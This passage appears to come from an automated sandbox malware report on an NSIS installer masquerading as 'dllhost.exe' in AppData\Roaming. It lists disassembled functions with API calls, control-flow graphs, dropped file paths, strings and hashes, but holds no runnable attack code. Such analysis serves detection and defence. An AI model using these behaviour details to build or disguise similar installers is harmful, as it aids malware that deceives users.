4063cc-4063d6 482->484 483->482 492 4063f0-406406 SHGetSpecialFolderLocation 484->492 493 4063d8-4063db 484->493 485->486 486->479 489 406437-40643d lstrcatW 486->489 487->481 489->479 496 406421 492->496 497 406408-40641f SHGetPathFromIDListW CoTaskMemFree 492->497 493->492 495 4063dd-4063ee SHGetFolderPathW 493->495 495->481 495->492 496->482 497->481 497->496
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063AF
                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063C2
                                                                              • SHGetFolderPathW.SHELL32(004052E7,00000000,00000000,: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063EA
                                                                              • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000), ref: 004063FE
                                                                              • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 0040640C
                                                                              • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 00406495
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryFolderPath$FreeFromListLocationSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 1812420262-905382516
                                                                              • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                              • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                                              • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                              • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                                                              Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 562 40176f-401794 call 402c37 call 405b94 567 401796-40179c call 40624c 562->567 568 40179e-4017b0 call 40624c call 405b1d lstrcatW 562->568 573 4017b5-4017b6 call 4064e0 567->573 568->573 577 4017bb-4017bf 573->577 578 4017c1-4017cb call 40658f 577->578 579 4017f2-4017f5 577->579 587 4017dd-4017ef 578->587 588 4017cd-4017db CompareFileTime 578->588 580 4017f7-4017f8 call 405d19 579->580 581 4017fd-401819 call 405d3e 579->581 580->581 589 40181b-40181e 581->589 590 40188d-4018b6 call 4052b0 call 4030fa 581->590 587->579 588->587 591 401820-40185e call 40624c * 2 call 40626e call 40624c call 4058ae 589->591 592 40186f-401879 call 4052b0 589->592 602 4018b8-4018bc 590->602 603 4018be-4018ca SetFileTime 590->603 591->577 624 401864-401865 591->624 604 401882-401888 592->604 602->603 606 4018d0-4018db CloseHandle 602->606 603->606 607 402ac8 604->607 609 4018e1-4018e4 606->609 610 402abf-402ac2 606->610 611 402aca-402ace 607->611 613 4018e6-4018f7 call 40626e lstrcatW 609->613 614 4018f9-4018fc call 40626e 609->614 610->607 621 401901-4022f6 call 4058ae 613->621 614->621 621->610 621->611 624->604 626 401867-401868 624->626 626->592
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,?,00000031), ref: 004017B0
                                                                              • CompareFileTime.KERNEL32(-00000014,?,Noncyclical,Noncyclical,00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,?,00000031), ref: 004017D5
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma
                                                                              • API String ID: 1941528284-2126595995
                                                                              • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                                              • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                                              • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                                              • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                                                              Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 628 4052b0-4052c5 629 4052cb-4052dc 628->629 630 40537c-405380 628->630 631 4052e7-4052f3 lstrlenW 629->631 632 4052de-4052e2 call 40626e 629->632 634 405310-405314 631->634 635 4052f5-405305 lstrlenW 631->635 632->631 637 405323-405327 634->637 638 405316-40531d SetWindowTextW 634->638 635->630 636 405307-40530b lstrcatW 635->636 636->634 639 405329-40536b SendMessageW * 3 637->639 640 40536d-40536f 637->640 638->637 639->640 640->630 641 405371-405374 640->641 641->630
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                                                              • SetWindowTextW.USER32(Completed,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: Completed
                                                                              • API String ID: 2531174081-3087654605
                                                                              • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                              • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                                              • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                              • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                                                              Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 642 4065b6-4065d6 GetSystemDirectoryW 643 4065d8 642->643 644 4065da-4065dc 642->644 643->644 645 4065ed-4065ef 644->645 646 4065de-4065e7 644->646 648 4065f0-406623 wsprintfW LoadLibraryExW 645->648 646->645 647 4065e9-4065eb 646->647 647->648
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                              • wsprintfW.USER32 ref: 00406608
                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                                                              Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 649 4030fa-403111 650 403113 649->650 651 40311a-403122 649->651 650->651 652 403124 651->652 653 403129-40312e 651->653 652->653 654 403130-403139 call 4032f5 653->654 655 40313e-40314b call 4032df 653->655 654->655 659 403151-403155 655->659 660 403296 655->660 662 40315b-40317b GetTickCount call 406787 659->662 663 40327f-403281 659->663 661 403298-403299 660->661 665 4032d8-4032dc 661->665 673 4032d5 662->673 675 403181-403189 662->675 666 403283-403286 663->666 667 4032ca-4032ce 663->667 668 403288 666->668 669 40328b-403294 call 4032df 666->669 670 4032d0 667->670 671 40329b-4032a1 667->671 668->669 669->660 682 4032d2 669->682 670->673 676 4032a3 671->676 677 4032a6-4032b4 call 4032df 671->677 673->665 679 40318b 675->679 680 40318e-40319c call 4032df 675->680 676->677 677->660 686 4032b6-4032c2 call 405df0 677->686 679->680 680->660 687 4031a2-4031ab 680->687 682->673 692 4032c4-4032c7 686->692 693 40327b-40327d 686->693 689 4031b1-4031ce call 4067a7 687->689 695 4031d4-4031eb GetTickCount 689->695 696 403277-403279 689->696 692->667 693->661 697 403236-403238 695->697 698 4031ed-4031f5 695->698 696->661 699 40323a-40323e 697->699 700 40326b-40326f 697->700 701 4031f7-4031fb 698->701 702 4031fd-40322e MulDiv wsprintfW call 4052b0 698->702 703 403240-403245 call 405df0 699->703 704 403253-403259 699->704 700->675 705 403275 700->705 701->697 701->702 707 403233 702->707 710 40324a-40324c 703->710 709 40325f-403263 704->709 705->673 707->697 709->689 711 403269 709->711 710->693 712 40324e-403251 710->712 711->673 712->709
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 0040315B
                                                                              • GetTickCount.KERNEL32(0040CEA0,00004000), ref: 004031DC
                                                                              • MulDiv.KERNEL32 ref: 00403209
                                                                              • wsprintfW.USER32 ref: 0040321C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                                              • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                                              • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                                              • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                                                              Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 713 40577f-4057ca CreateDirectoryW 714 4057d0-4057dd GetLastError 713->714 715 4057cc-4057ce 713->715 716 4057f7-4057f9 714->716 717 4057df-4057f3 SetFileSecurityW 714->717 715->716 717->715 718 4057f5 GetLastError 717->718 718->716
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                                              • GetLastError.KERNEL32 ref: 004057D6
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                                              • GetLastError.KERNEL32 ref: 004057F5
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming, xrefs: 0040577F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID: C:\Users\user\AppData\Roaming
                                                                              • API String ID: 3449924974-2707566632
                                                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                                                              Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 719 405d6d-405d79 720 405d7a-405dae GetTickCount GetTempFileNameW 719->720 721 405db0-405db2 720->721 722 405dbd-405dbf 720->722 721->720 723 405db4 721->723 724 405db7-405dba 722->724 723->724
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,?,"C:\Users\user\AppData\Roaming\dllhost.exe" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006), ref: 00405D8B
                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\AppData\Roaming\dllhost.exe" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589), ref: 00405DA6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-338990885
                                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                                                              Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 725 401c19-401c39 call 402c15 * 2 730 401c45-401c49 725->730 731 401c3b-401c42 call 402c37 725->731 733 401c55-401c5b 730->733 734 401c4b-401c52 call 402c37 730->734 731->730 737 401ca9-401cd3 call 402c37 * 2 FindWindowExW 733->737 738 401c5d-401c79 call 402c15 * 2 733->738 734->733 750 401cd9 737->750 748 401c99-401ca7 SendMessageW 738->748 749 401c7b-401c97 SendMessageTimeoutW 738->749 748->750 751 401cdc-401cdf 749->751 750->751 752 401ce5 751->752 753 402abf-402ace 751->753 752->753
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
